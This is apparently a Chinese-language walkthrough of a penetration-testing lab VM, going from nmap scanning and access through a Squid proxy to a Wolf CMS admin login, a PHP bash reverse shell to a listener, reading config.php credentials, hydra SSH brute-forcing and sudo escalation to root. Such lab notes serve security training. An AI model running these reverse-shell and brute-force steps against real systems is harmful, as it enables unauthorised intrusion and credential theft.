知识点
- Squid 站点代理
主机发现
nmap -sn 192.168.80.1-200
信息收集
- 端口扫描
nmap -A -T4 192.168.80.1 -oA nmap/nmap
- 站点代理
http://192.168.80.3/robots.txt
http://192.168.80.3/wolfcms/
http://192.168.80.3/wolfcms/?admin
弱密码测试
- 创建shell
<?php exec("bash -c 'bash -i >& /dev/tcp/192.168.80.2/4444 0>&1'");?>
- 获得shell
nc -nvlp 4444
cd /var/www/wolfcms/
cat config.php
提权
hydra -L sshusers.txt -p john@123 192.168.80.3 ssh
ssh sickos@192.168.80.3
sudo -l
sudo -s
END